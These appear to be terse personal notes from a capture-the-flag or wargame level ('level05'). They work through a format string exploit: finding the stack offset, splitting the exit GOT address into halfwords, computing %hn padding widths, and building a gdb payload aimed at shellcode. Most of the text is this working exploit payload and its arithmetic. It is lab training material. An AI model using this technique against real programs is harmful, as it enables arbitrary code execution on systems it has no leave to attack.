format string spotted !

python -c 'print("aaaa" + "%p " * 40)' | ./level05 = 10eme adresse

Nous sommes au 10eme offset

==========================
Addr exit = 0x080497e0
0x0804	| 0x97e0
 2052	|  38880

2052 - 12 = 2040
38880 - 2052 = 36828
==========================

r <<< $(python -c 'print("aaaa" + "\xe2\x97\x04\x08\xe0\x97\x04\x08" + "%2040d%11$hn" + "%36828d%12$hn")')

checkpoint : r <<< $(python -c 'print("aaaa" + "\xe2\x97\x04\x08\xe0\x97\x04\x08" + "%11$hn" + "%12$hn")')


============
addr SHELLCODE = 0xffffd877
0xffff	| 0xd877
65535	|  55415

55415 - 12 = 55403
65535 - 55403 = 10132
============
